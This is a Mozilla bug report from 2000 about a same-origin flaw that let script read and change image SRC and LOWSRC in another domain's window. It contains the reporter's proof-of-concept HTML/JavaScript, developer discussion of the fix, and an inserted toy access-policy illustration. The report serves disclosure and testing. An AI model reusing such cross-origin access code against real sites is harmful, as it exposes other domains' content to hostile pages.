Closed
Bug 41230
Opened 24 years ago
Closed 24 years ago
image SRC and LOWSRC are not checked for same origin as all.js said
Categories: Core :: Security, defect, P3
Tracking: VERIFIED FIXED, M17
People: Reporter: czhang, Assigned: security-bugs
Details: Whiteboard: [nsbeta2+]
load 6/01 build
1. go to http://cathyz/origin/image.html
2. click "hack image src"
3. wait for a while, see the src of image of another domain, and you are also
able to change the src of the image.
the code is:
---------------http://cathyz/origin/image.html-------------------------
<html>
<head>
<script>
var newin;
function getSrc() {
  // Open a page on another host (cathyz2), then read and overwrite its image's SRC and LOWSRC.
  newin=window.open("http://cathyz2/sameori/image.html","newinow");
  setTimeout("document.F1.T1.value='SRC value is ' + newin.document.images[0].src;", 6000);
  setTimeout("document.F1.T2.value='LOWSRC value is ' + newin.document.images[0].lowsrc;", 6000);
  setTimeout("newin.document.images[0].src='http://cathyz2/images/lowstar.gif';", 7000);
  setTimeout("newin.document.images[0].lowsrc='http://cathyz2/images/highstar.gif';", 7000);
}
</script>
</head>
<body>
<a href=javascript:void(0) onClick="getSrc()"> hack src of image</a>
<form name="F1">
<input type=text size=50 name="T1">
<br> <input type=text size=50 name="T2">
</form>
</body>
</html>
Comment 1•24 years ago
ok.. so you shouldn't be able to work with .src of an image in a window from a
different domain. should you be able to do _anything_ with images in window
from another domain -- even find out how many there are?
Comment 2•24 years ago (Assignee)
No. You are correct, Jesse.
Comment 3•24 years ago
Was bug 39083 somehow fixed without fixing this? It seems to me that they were
the same bug (able to access document.images across domains), but mstoltz's
05/26/2000 16:28 checkin comments imply that bug 39083 was about innerHTML.
Since I'm not that experienced with DOM (especially cross-window), I'm probably
missing something fairly obvious.
Updated•24 years ago
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 4•24 years ago
Assigning QA to czhang
Comment 5•24 years ago (Assignee)
Hmm, we do have a check for htmlimageelement.src and .lowsrc, but that check
doesn't seem to be happening here. I'm not sure why. Changing all properties to
sameOrigin by default would fix this, but there may be a more localized solution
if necessary. Marking as dependent on the safe-default bug, and nominating
nsbeta2.
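The difference between per-property entries and a sameOrigin default, as raised in comments 1 and 5, shown in a toy model. This is an added illustration, not Mozilla's code; the function names, the `allAccess` level and the `HTMLCollection.length` key are assumptions, and the URLs are the two test pages from the report.

```javascript
// Added illustration, not Mozilla code: a toy per-property access policy.
// "sameOrigin" follows the thread; all other names are hypothetical.
const ALL_ACCESS = "allAccess";
const SAME_ORIGIN = "sameOrigin";

// An origin is the (scheme, host, port) triple of a URL.
function originOf(url) {
  const u = new URL(url);
  const port = u.port || (u.protocol === "https:" ? "443" : "80");
  return `${u.protocol}//${u.hostname}:${port}`;
}

// entries: explicit "class.property" -> level; defaultLevel applies when no entry matches.
function makePolicy(entries, defaultLevel) {
  const map = new Map();
  for (const [key, level] of Object.entries(entries)) map.set(key.toLowerCase(), level);
  return { map, defaultLevel };
}

// May a script loaded from callerUrl touch className.prop on a document from targetUrl?
function canAccess(policy, callerUrl, targetUrl, className, prop) {
  const key = `${className}.${prop}`.toLowerCase();
  const level = policy.map.has(key) ? policy.map.get(key) : policy.defaultLevel;
  if (level === ALL_ACCESS) return true;
  return originOf(callerUrl) === originOf(targetUrl);
}

// The two pages from the report, plus explicit entries for the image properties.
const CALLER = "http://cathyz/origin/image.html";
const TARGET = "http://cathyz2/sameori/image.html";
const LISTED = {
  "htmlimageelement.src": SAME_ORIGIN,
  "htmlimageelement.lowsrc": SAME_ORIGIN,
};

function compareDefaults() {
  const permissive = makePolicy(LISTED, ALL_ACCESS);
  const safe = makePolicy(LISTED, SAME_ORIGIN);
  // Comment 1's question: counting the images is not a listed property.
  const probe = (p) => canAccess(p, CALLER, TARGET, "HTMLCollection", "length");
  return {
    listedSrcCrossOrigin: canAccess(permissive, CALLER, TARGET, "HTMLImageElement", "src"),
    unlistedPermissive: probe(permissive),
    unlistedSafe: probe(safe),
    sameOriginStillWorks: canAccess(safe, TARGET, TARGET, "HTMLImageElement", "src"),
  };
}

console.log(compareDefaults());
```

With a permissive default, every property that lacks its own entry stays reachable across origins; with a sameOrigin default, a forgotten entry fails closed.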
Comment 7•24 years ago (Assignee)
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Updated•19 years ago
Flags: testcase+
Updated•18 years ago
Flags: in-testsuite+ → in-testsuite?